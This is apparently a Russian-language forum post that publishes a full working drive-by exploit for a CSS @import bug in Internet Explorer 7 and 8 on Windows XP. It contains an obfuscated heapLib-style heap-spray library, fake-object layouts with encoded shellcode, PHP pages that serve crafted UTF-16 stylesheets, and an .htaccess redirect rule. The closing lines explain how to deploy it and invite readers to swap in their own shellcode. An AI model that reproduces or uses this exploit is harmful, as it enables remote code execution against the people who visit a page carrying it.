101215 IE8 XP CSS import

Вот делал под IE7-8 на XP, без обхода DEP через .NET 2.0.
основной код:
// Empty namespace holder; the heap-manipulation constructor below hangs off it.
function dKoYceWdi() {
}

// Constructor of the heap-manipulation helper (an obfuscated heapLib-style class).
//   maxAlloc - upper bound, in bytes, of the padding string's BSTR size
//              (default 65535; 0 also falls back to the default)
//   heapBase - base address used by the free-list address helper (default 0x150000)
// Builds the padding string by repeated doubling while the string would still
// fit below maxAlloc under the 4 + 2*len + 2 byte rule (4-byte length prefix,
// UTF-16 payload, 2-byte terminator), sets up the per-tag allocation table and
// performs an initial OLEAUT32 cache flush.
dKoYceWdi.hEIAWeqkQfxY = function(maxAlloc, heapBase) {
  this.maxAlloc = maxAlloc || 65535;
  this.heapBase = heapBase || 0x150000;

  var pad = "AAAA";
  while (4 + pad.length * 2 + 2 < this.maxAlloc) {
    pad += pad;
  }
  this.NETZjoYvfZdvXqiRMTVpH = pad;

  // Allocations are filed by tag so that whole groups can be freed at once.
  this.mem = [];
  this.HdKblZOtccRYKLUXReW();
};

// Debug trace hook. `msg` is only ever handed to Math.atan2 together with the
// 0xbabe marker and the result is discarded, so this has no effect on the
// program; presumably a debugger breakpoint on the engine's atan2 is used to
// read the message (a heapLib convention) - not verifiable from this file.
dKoYceWdi.hEIAWeqkQfxY.prototype.OTvoUqKH = function(msg) {
  Math.atan2(0xbabe, msg);
};

// Second debug hook: signals "enable"/"disable" through which Math function is
// called with the 0xbabe marker (atan for `enable == true`, loose equality, and
// asin for anything else). No observable effect on the program itself.
dKoYceWdi.hEIAWeqkQfxY.prototype.u = function(enable) {
  var signal = (enable == true) ? Math.atan : Math.asin;
  signal(0xbabe);
};

// Third debug hook: calls Math.acos with the 0xbabe marker. `msg` is accepted
// for symmetry with the other hooks but is never used.
dKoYceWdi.hEIAWeqkQfxY.prototype.iEKfXewEQKTlKbObDc = function(msg) {
  var marker = 0xbabe;
  Math.acos(marker);
};

// Returns the first `len` UTF-16 units of the padding string built by the
// constructor. Throws a plain string if more is requested than is available.
// substr() is kept on purpose: heapLib relies on it producing a fresh string
// rather than a reference to the shared padding (engine-dependent; presumed).
dKoYceWdi.hEIAWeqkQfxY.prototype.NVQPiTlfMmsicOlDBURHLErMAvNjmDei = function(len) {
  var available = this.NETZjoYvfZdvXqiRMTVpH.length;
  if (len > available) {
    throw "Requested NVQPiTlfMmsicOlDBURHLErMAvNjmDei string length " + len + ", only " + available + " available";
  }
  return this.NETZjoYvfZdvXqiRMTVpH.substr(0, len);
};

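// Rounds `num` up to the next multiple of `OAVCHJeYLy` (the rounding unit).
// Throws a plain string when the unit is 0 (loose comparison kept, so "0"
// is rejected as well). The integer division now uses Math.floor instead of
// parseInt(): parseInt stringified the quotient (no radix, and a quotient in
// exponential notation parsed to its leading digits). Results are identical
// for the non-negative sizes this class deals with.
dKoYceWdi.hEIAWeqkQfxY.prototype.OAVCHJeYLy = function(num, OAVCHJeYLy) {
  if (OAVCHJeYLy == 0)
    throw "Round argument cannot be 0";

  var quotient = Math.floor((num + (OAVCHJeYLy - 1)) / OAVCHJeYLy);
  return quotient * OAVCHJeYLy;
};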

// Formats `num` as upper-case hexadecimal without a prefix, left-padded with
// zeros to at least `width` characters (default 0, i.e. no padding). Digits are
// taken with the 32-bit operators `&` and `>>>`, exactly as the original did,
// so values outside the unsigned 32-bit range or negative values are not
// rendered the way Number.prototype.toString(16) would render them.
dKoYceWdi.hEIAWeqkQfxY.prototype.ugbbzVyLSFeeqCgOijbKTMHdbUnnW = function(num, width)
{
  var alphabet = "0123456789ABCDEF";
  var rest = num;
  var parts = [];

  for (;;) {
    parts.unshift(alphabet.charAt(rest & 0xF));
    if (!(rest > 0xF)) break;
    rest = rest >>> 4;
  }

  var text = parts.join("");
  var minWidth = width || 0;
  while (text.length < minWidth) {
    text = "0" + text;
  }

  return text;
};

// Encodes a 32-bit value as the two UTF-16 units that hold it in little-endian
// order (low half first), i.e. as the value would sit in memory once the string
// is written out. Equivalent to unescape("%uLLLL%uHHHH") with four-digit hex.
dKoYceWdi.hEIAWeqkQfxY.prototype.FhABckODp = function(FhABckODp) {
  var low = FhABckODp & 0xFFFF;
  var high = (FhABckODp >> 16) & 0xFFFF;
  return String.fromCharCode(low, high);
};

// Allocates one string and files it under `tag` so the group can be freed later.
// `arg` is either a string (stored as a copy; its size is 4 + 2*length + 2
// bytes) or a byte size, in which case a padding substring of (arg-6)/2 units
// is taken so that the string occupies exactly `arg` bytes. Throws a plain
// string if the size is not a multiple of 16. When `tag` is omitted the string
// is filed under the key "undefined" (and nothing on this page frees that key).
dKoYceWdi.hEIAWeqkQfxY.prototype.oQIncDbP = function(arg, tag) {

var size;
if (typeof arg == "string" || arg instanceof String)
size = 4 + arg.length*2 + 2;
else
size = arg;
if ((size & 0xf) != 0)
throw "Allocation size " + size + " must be a multiple of 16";
if (this.mem[tag] === undefined)
this.mem[tag] = new Array();

if (typeof arg == "string" || arg instanceof String) {
// substr(0, length) instead of the string itself: presumably to force a fresh
// copy (heapLib depends on this to get a new allocation) - keep it as is.
this.mem[tag].push(arg.substr(0, arg.length));
}
else {
this.mem[tag].push(this.NVQPiTlfMmsicOlDBURHLErMAvNjmDei((arg-6)/2));
}
}

// Frees every string filed under `tag`: drops the group and immediately calls
// CollectGarbage() so the now-unreferenced strings are collected right away
// rather than at the engine's discretion. CollectGarbage is a JScript/IE-only
// global and does not exist in other engines.
dKoYceWdi.hEIAWeqkQfxY.prototype.MxqwJOtisWewUSizjsIlnyZTgN = function(tag) {

delete this.mem[tag];
CollectGarbage();
}

// Flushes the OLEAUT32 BSTR cache: frees whatever the previous flush allocated
// under "oleaut32", then makes six allocations of each of 32, 64, 256 and 32768
// bytes under that tag (the four sizes the non-cached allocator rejects). These
// stay referenced until the next flush. Called by the constructor and by the
// two free helpers below.
dKoYceWdi.hEIAWeqkQfxY.prototype.HdKblZOtccRYKLUXReW = function() {

this.OTvoUqKH("Flushing the OLEAUT32 cache");

this.MxqwJOtisWewUSizjsIlnyZTgN("oleaut32");

for (var i = 0; i < 6; i++) {
this.oQIncDbP(32, "oleaut32");
this.oQIncDbP(64, "oleaut32");
this.oQIncDbP(256, "oleaut32");
this.oQIncDbP(32768, "oleaut32");
}
}

// Allocation that must not be one of the cached sizes. Computes the byte size
// the same way the plain allocator does (4 + 2*length + 2 for a string, the
// number itself otherwise) and refuses 32, 64, 256 and 32768 bytes - exactly
// the sizes the flush routine uses to evict the OLEAUT32 cache, so such an
// allocation could not be flushed out later. Otherwise delegates to oQIncDbP.
dKoYceWdi.hEIAWeqkQfxY.prototype.ISKbhWtKEPROiZZiHGSCQ = function(arg, tag) {
  var isString = (typeof arg == "string" || arg instanceof String);
  var size = isString ? 4 + arg.length * 2 + 2 : arg;

  var isCachedSize = (size == 32 || size == 64 || size == 256 || size == 32768);
  if (isCachedSize) {
    throw "Allocation sizes " + size + " cannot be flushed out of the OLEAUT32 cache";
  }
  this.oQIncDbP(arg, tag);
};

// Frees the `tag` group and then re-flushes the OLEAUT32 cache; the order is the
// point (presumably so the freed blocks are not simply absorbed by the cache).
dKoYceWdi.hEIAWeqkQfxY.prototype.gNz = function(tag) {
this.MxqwJOtisWewUSizjsIlnyZTgN(tag);
this.HdKblZOtccRYKLUXReW();
}

// Runs the JScript garbage collector explicitly (after a trace message) and
// then re-flushes the OLEAUT32 cache. CollectGarbage is IE-only.
dKoYceWdi.hEIAWeqkQfxY.prototype.lShRAHuECPTMCuMHrKJ = function() {

this.OTvoUqKH("Running the garbage collector");
CollectGarbage();

this.HdKblZOtccRYKLUXReW();
}

// Looks like heapLib's lookaside primitive (the tag is the method's own name).
// `count` times (default 1; 0 also becomes 1) it allocates `arg` untagged and
// then under the tag, makes one more untagged allocation, and finally frees the
// tagged group with a cache re-flush. Untagged allocations are filed under the
// key "undefined" and stay referenced for the object's lifetime.
dKoYceWdi.hEIAWeqkQfxY.prototype.gnUzNdeypofkDcuRkplPKXC = function(arg, count) {

var count = (count ? count : 1);

for (var i = 0; i < count; i++) {
this.ISKbhWtKEPROiZZiHGSCQ(arg);
this.ISKbhWtKEPROiZZiHGSCQ(arg, "gnUzNdeypofkDcuRkplPKXC");
}
this.ISKbhWtKEPROiZZiHGSCQ(arg);

this.gNz("gnUzNdeypofkDcuRkplPKXC");
}

// Free-list style sequence (tag = method name). `arg` must be a 16-byte
// multiple with size + 8 < 1024, i.e. at most 1008 bytes; it is allocated
// `count` times (default 1; 0 becomes 1) through the non-cached allocator, and
// the whole group is then freed with a cache re-flush. Both checks throw plain
// strings.
dKoYceWdi.hEIAWeqkQfxY.prototype.PRsdnUGLcA = function(arg, count) {

var size;
if (typeof arg == "string" || arg instanceof String)
size = 4 + arg.length*2 + 2;
else
size = arg;
if ((size & 0xf) != 0)
throw "Allocation size " + size + " must be a multiple of 16";

if (size+8 >= 1024)
throw("Maximum PRsdnUGLcA block size is 1008 bytes");

var count = (count ? count : 1);

for (var i = 0; i < count; i++)
this.ISKbhWtKEPROiZZiHGSCQ(arg, "PRsdnUGLcA");

this.gNz("PRsdnUGLcA");
}

// Computes heapBase + 0x688 + ((size + 8) / 8) * 48 for an allocation of the
// given size (a string's size is 4 + 2*length + 2). Same validation as the
// free-list routine: the size must be a 16-byte multiple with size + 8 < 1024,
// both failures throwing plain strings. The constants 0x688 and 48 are the
// author's; presumably the offset and stride of a per-size free-list table in
// the heap structure - not verified here.
dKoYceWdi.hEIAWeqkQfxY.prototype.PCDwQTxkrwE = function(arg)
{
  var isString = (typeof arg == "string" || arg instanceof String);
  var size = isString ? 4 + arg.length * 2 + 2 : arg;

  if ((size & 0xf) != 0) {
    throw "Allocation size " + size + " must be a multiple of 16";
  }

  var chunk = size + 8;
  if (chunk >= 1024) {
    throw("Maximum PRsdnUGLcA block size is 1008 bytes");
  }

  var slot = (chunk / 8) * 48;
  return this.heapBase + 0x688 + slot;
};

// Builds a fake-vtable string of `size` bytes (default 1008): a 4-byte stub
// (90 90 eb 7c: nop, nop, jmp short +0x7c), 31 copies of the `jmpecx` address
// (124 bytes), the two words 0x0028 0x0028, the shellcode, and padding. The
// padding length makes the string (size - 6) / 2 units, i.e. exactly `size`
// bytes under the allocator's 4 + 2*len + 2 rule. Throws plain strings if
// `size` is not a 16-byte multiple or the shellcode exceeds size - 138 bytes.
// NOTE(review): the padding call on the last line goes through the global
// `heap` rather than `this`, so this method only works once something has
// assigned that global (gogogo() does). Not called anywhere on this page.
dKoYceWdi.hEIAWeqkQfxY.prototype.jnWdIcLNTenPKlIfrYRthrunPBs = function(shellcode, jmpecx, size) {

var size = (size ? size : 1008);
if ((size & 0xf) != 0)
throw "Vtable size " + size + " must be a multiple of 16";

if (shellcode.length*2 > size-138)
throw("Maximum shellcode length is " + (size-138) + " bytes");

var jnWdIcLNTenPKlIfrYRthrunPBs = unescape("%u9090%u7ceb")

for (var i = 0; i < 124/4; i++)
jnWdIcLNTenPKlIfrYRthrunPBs += this.FhABckODp(jmpecx);

jnWdIcLNTenPKlIfrYRthrunPBs += unescape("%u0028%u0028") +
shellcode + heap.NVQPiTlfMmsicOlDBURHLErMAvNjmDei((size-138)/2 - shellcode.length);

return jnWdIcLNTenPKlIfrYRthrunPBs;

}

// Appends an iframe pointing at utf.php to <head>; that page is what carries
// the crafted stylesheet, so this is the step that starts the actual trigger.
// Uses getElementsByTagName("head")[0] rather than document.head, which the
// targeted IE versions do not have.
function go_css(){
  var frame = document.createElement("iframe");
  frame.setAttribute("src", "utf.php");
  var head = document.getElementsByTagName("head")[0];
  head.appendChild(frame);
}

IE7:
// IE7 variant of the trigger (per the post: XP only, does not work on Vista/7).
// Sprays the heap with a crafted block - a fake object layout annotated by the
// author with ecx+offset comments, followed by the shellcode - and then loads
// utf.php in an iframe, which delivers the crafted stylesheet. Words such as
// "%ue020%u105a" are little-endian 32-bit values (0x105ae020); which module they
// point into is not stated on this page. The post says the shellcode launches
// calc; not verified here.
function gogogo() {
// Implicit global, apparently on purpose: the library's vtable helper reads the
// global `heap` rather than `this`.
heap = new dKoYceWdi.hEIAWeqkQfxY(0x20000);
var heapspray = unescape(""+
/*ecx+0x00*/ "%ue020%u105a"+
/*ecx+0x04*/ "%u9999%u9999"+
/*ecx+0x08*/ "%ue020%u105a"+
/*ecx+0x0c*/ "%u8888%u8888"+
/*ecx+0x10*/ "%ue020%u105a"+ /*ESI*/
/*ecx+0x14*/ "%u0001%u0000"+
/*ecx+0x18*/ "%u0100%u0000"+ /*const*/
/*ecx+0x1c*/ "%ue020%u105a"+ /*const*/
/*ecx+0x20*/ "%ue088%u105a"+ /*const*/
/*ecx+0x24*/ "%u9999%u9999"+ /* goto to edx*/
/*ecx+0x28*/ "%u5555%u9999"+
/*ecx+0x2c*/ "%u9944%u9999"+
/*ecx+0x30*/ "%u9933%u9999"+ /* EAX */
/*ecx+0x34*/ "%u0002%u0000"+
/*ecx+0x38*/ "%u9922%u9999"+
/*ecx+0x3c*/ "%u9911%u9999"+
/*ecx+0x40*/ "%u9999%u9999"+
/*ecx+0x44*/ "%u9999%u9999"+
/*ecx+0x48*/ "%u9999%u9999"+
/*ecx+0x4c*/ "%u9999%u9999"+
/*ecx+0x50*/ "%u9999%u9999"+
/*ecx+0x54*/ "%u9999%u9999"+ /*const*/
/*ecx+0x58*/ "%u9999%u9999"+
/*ecx+0x5c*/ "%ue025%u105a"+
/*ecx+0x60*/ "%ue044%u105a"+ /**/
/*ecx+0x64*/ "%ue082%u105a"+ /**/
/*ecx+0x68*/ "%ue06c%u105a"+ /*its on EDX*/
/*ecx+0x6c*/ "%ue090%u105a"+/*goto scode*/
/*ecx+0x70*/ /*shellcode*/
"%ucada%ub6bd%uaaad%ud94a%u2474%u29f4%ub1c9%u5e33%uee83%u31fc%u136e%ud803%u48be%ud8bf%u0529%u2040%u76aa%uc5c8%ua49b%u8eae%u788e%uc2a4%uf222%uf6e8%u76b1%uf925%u3c72%u3413%uf082%u9a9b%u9240%ue067%u7494%u2b59%u75e9%u519e%u2702%u1e77%ud8b1%u62fc%ud80a%ue9d2%ua232%u2d57%u18c6%u7d59%u1677%u6511%u70f3%u9482%u62d0%udffe%u505d%ude74%ua8b7%ud175%u67f7%ude48%u76f5%ud88c%u0ce5%u1be6%u169b%u663d%u9247%uc0a0%u040c%uf101%ud3c1%ufdc2%u90ae%ue18d%u7431%u1da6%u7bb9%u9469%u5ff9%ufdad%uc15a%u5bf4%ufe0c%u03e7%u5af1%ua163%udde6%uaf2e%u6cf9%u9655%u6efa%ub856%u5f92%u57dd%u5fe4%u1c34%u2a1a%u3415%uf3b3%u05cf%u03de%u493a%u87e7%u31cf%u971c%u34a5%u1f58%u4455%ucaf1%ufb59%udef2%u9a39%u8260%u3993%u2101%u41ec");
// Pad the chunk to 0x1000 UTF-16 units, double it up to 0x40000 units, then trim
// it to 0x3FFDD units: under the allocator's 4 + 2*len + 2 rule that is a
// 0x7FFC0-byte string, a multiple of 16 as oQIncDbP requires.
while(heapspray.length < 0x1000) heapspray += unescape("%u4444");
var heapblock = heapspray;
while(heapblock.length < 0x40000) heapblock += heapblock;
// `finalspray` is another implicit global.
finalspray = heapblock.substring(2, 0x40000 - 0x21);
// 500 copies through the non-cached allocator; no tag is passed, so they are
// filed under the key "undefined" and never freed.
for(var counter = 0; counter < 500; counter++) { heap.ISKbhWtKEPROiZZiHGSCQ(finalspray); }
// Only after the spray is in place is the stylesheet-loading page pulled in.
go_css();
}
// Runs on script load. Per the post, this IE7 block goes into the main page
// together with the library code above (the IE8 block below is the alternative).
gogogo();

IE8:
// IE8 variant of the trigger: same procedure as the IE7 block above with a
// different fake-object layout (compare the ecx+0x08..0x68 words). Per the post
// it is XP only and does not work on Vista/7. The "%ue020%u105a"-style words are
// little-endian 32-bit values (0x105ae020) whose target module is not stated on
// this page; the post says the shellcode launches calc - not verified here.
function gogogo() {
// Implicit global, apparently on purpose: the library's vtable helper reads the
// global `heap` rather than `this`.
heap = new dKoYceWdi.hEIAWeqkQfxY(0x20000);
var heapspray = unescape(""+
/*ecx+0x00*/ "%ue020%u105a"+
/*ecx+0x04*/ "%u9999%u9999"+
/*ecx+0x08*/ "%u9999%u9999"+
/*ecx+0x0c*/ "%u9999%u9999"+
/*ecx+0x10*/ "%u9999%u9999"+
/*ecx+0x14*/ "%u9999%u9999"+
/*ecx+0x18*/ "%u0001%u0000"+ /*const*/
/*ecx+0x1c*/ "%u0100%u0000"+ /*const*/
/*ecx+0x20*/ "%ue020%u105a"+ /*const*/
/*ecx+0x24*/ "%ue088%u105a"+ /* goto to edx*/
/*ecx+0x28*/ "%u9999%u9999"+
/*ecx+0x2c*/ "%u9999%u9999"+
/*ecx+0x30*/ "%ue020%u105a"+ /* EAX */
/*ecx+0x34*/ "%u9999%u9999"+
/*ecx+0x38*/ "%u9999%u9999"+
/*ecx+0x3c*/ "%u9999%u9999"+
/*ecx+0x40*/ "%u9999%u9999"+
/*ecx+0x44*/ "%u9999%u9999"+
/*ecx+0x48*/ "%u9999%u9999"+
/*ecx+0x4c*/ "%u9999%u9999"+
/*ecx+0x50*/ "%u9999%u9999"+
/*ecx+0x54*/ "%u0100%u0000"+ /*const*/
/*ecx+0x58*/ "%u9999%u9999"+
/*ecx+0x5c*/ "%u9999%u9999"+
/*ecx+0x60*/ "%ue044%u105a"+ /**/
/*ecx+0x64*/ "%ue082%u105a"+ /**/
/*ecx+0x68*/ "%ue06c%u105a"+ /*its on EDX*/
/*ecx+0x6c*/ "%ue090%u105a"+/*goto scode*/
/*ecx+0x70*/ /*shellcode*/
"%ucada%ub6bd%uaaad%ud94a%u2474%u29f4%ub1c9%u5e33%uee83%u31fc%u136e%ud803%u48be%ud8bf%u0529%u2040%u76aa%uc5c8%ua49b%u8eae%u788e%uc2a4%uf222%uf6e8%u76b1%uf925%u3c72%u3413%uf082%u9a9b%u9240%ue067%u7494%u2b59%u75e9%u519e%u2702%u1e77%ud8b1%u62fc%ud80a%ue9d2%ua232%u2d57%u18c6%u7d59%u1677%u6511%u70f3%u9482%u62d0%udffe%u505d%ude74%ua8b7%ud175%u67f7%ude48%u76f5%ud88c%u0ce5%u1be6%u169b%u663d%u9247%uc0a0%u040c%uf101%ud3c1%ufdc2%u90ae%ue18d%u7431%u1da6%u7bb9%u9469%u5ff9%ufdad%uc15a%u5bf4%ufe0c%u03e7%u5af1%ua163%udde6%uaf2e%u6cf9%u9655%u6efa%ub856%u5f92%u57dd%u5fe4%u1c34%u2a1a%u3415%uf3b3%u05cf%u03de%u493a%u87e7%u31cf%u971c%u34a5%u1f58%u4455%ucaf1%ufb59%udef2%u9a39%u8260%u3993%u2101%u41ec");
// Pad the chunk to 0x1000 UTF-16 units, double it up to 0x40000 units, then trim
// it to 0x3FFDD units: under the allocator's 4 + 2*len + 2 rule that is a
// 0x7FFC0-byte string, a multiple of 16 as oQIncDbP requires.
while(heapspray.length < 0x1000) heapspray += unescape("%u4444");
var heapblock = heapspray;
while(heapblock.length < 0x40000) heapblock += heapblock;
// `finalspray` is another implicit global.
finalspray = heapblock.substring(2, 0x40000 - 0x21);
// 500 copies through the non-cached allocator; no tag is passed, so they are
// filed under the key "undefined" and never freed.
for(var counter = 0; counter < 500; counter++) { heap.ISKbhWtKEPROiZZiHGSCQ(finalspray); }
// Only after the spray is in place is the stylesheet-loading page pulled in.
go_css();
}
// Runs on script load. This block is the IE8 alternative to the IE7 block above;
// a page should carry only one of the two gogogo definitions.
gogogo();



utf.php
<?


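/**
 * Widens a byte string to UTF-16LE by inserting a NUL after every byte.
 * Only correct for ASCII input: a multi-byte UTF-8 sequence is split byte by
 * byte and yields garbage code units.
 *
 * @param string $str input bytes
 * @return string     2 * strlen($str) bytes; "" for empty input
 */
function du($str){
    // Initialised explicitly: the original appended to an undefined variable
    // (a PHP notice/warning) and returned null instead of "" for empty input.
    $returnval = '';
    $strlength = strlen($str);
    for($i=0; $i<$strlength; $i++){
        $returnval .= $str[$i]."\x00";
    }
    return $returnval;
}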

// NOTE(review): this file opens with the short tag "<?", which needs short_open_tag=On.
// Two halves of a small inline script: it creates a <link rel="Stylesheet"> and
// the first heredoc stops in the middle of the href attribute so that the raw
// pointer bytes below can be spliced in between the halves.
$css =
<<<css
var vlink = document.createElement("link");
vlink.setAttribute("rel", "Stylesheet");
vlink.setAttribute("type", "text/css");
vlink.setAttribute("href", "
css;
$css2 =
<<<css2
");
document.getElementsByTagName("head")[0].appendChild(vlink);
css2;



// 0x105ae020 repeated four times, little-endian - the same value the JavaScript
// spray uses. Inserted raw (not widened) between the two UTF-16LE halves, so it
// is read as 8 code units inside the href; presumably that href does not
// resolve and the 404 is redirected to css.php by the .htaccess rule below.
$ret = "\x20\xe0\x5a\x10\x20\xe0\x5a\x10\x20\xe0\x5a\x10\x20\xe0\x5a\x10";

$exp = du($css).$ret.du($css2);
// UTF-16LE BOM first, then the whole page widened so the browser decodes it as
// UTF-16LE. No Content-Type header is sent; the response relies on defaults.
echo "\xff\xfe";
echo du("<html><head></head><body><script>").$exp.du("</script>");

die;


?>


.htaccess
# With an absolute URL, Apache answers every 404 with a redirect to css.php;
# that is how the unresolvable href/@import URLs above end up fetching it.
ErrorDocument 404 http://domain.com/css.php

css.php
<?


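/**
 * Widens a byte string to UTF-16LE by inserting a NUL after every byte.
 * Only correct for ASCII input: a multi-byte UTF-8 sequence is split byte by
 * byte and yields garbage code units.
 *
 * @param string $str input bytes
 * @return string     2 * strlen($str) bytes; "" for empty input
 */
function du($str){
    // Initialised explicitly: the original appended to an undefined variable
    // (a PHP notice/warning) and returned null instead of "" for empty input.
    $returnval = '';
    $strlength = strlen($str);
    for($i=0; $i<$strlength; $i++){
        $returnval .= $str[$i]."\x00";
    }
    return $returnval;
}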

// NOTE(review): this file opens with the short tag "<?", which needs short_open_tag=On.
// The stylesheet served on every 404 (see .htaccess): four '@import url("...");'
// rules whose URL is the raw 16-byte pointer pattern rather than text. Each
// import is itself unresolvable, so it is expected to 404 and be redirected
// back to this script.
$css =
<<<css
@import url("
css;
$css2 =
<<<css2
");

css2;




// 0x105ae020 four times, little-endian; spliced in raw between the UTF-16LE halves.
$ret = "\x20\xe0\x5a\x10\x20\xe0\x5a\x10\x20\xe0\x5a\x10\x20\xe0\x5a\x10";

$exp = du($css).$ret.du($css2).du($css).$ret.du($css2).du($css).$ret.du($css2).du($css).$ret.du($css2);
// UTF-16LE BOM followed by the widened stylesheet. No Content-Type header is
// sent, so the browser has to accept the default type as a stylesheet.
echo "\xff\xfe";
echo $exp;

die;

?>
 
Ничего сложного: основной код + блок IE7 идут в основную страницу,
остальное копируешь на сервер. Нужен Apache с включённой обработкой .htaccess.
Шеллкод сейчас — запуск calc; можешь заменить любым своим.
Будут вопросы — пиши сюда, разъясню по ходу дела.
В Vista и Windows 7 не работает.
 

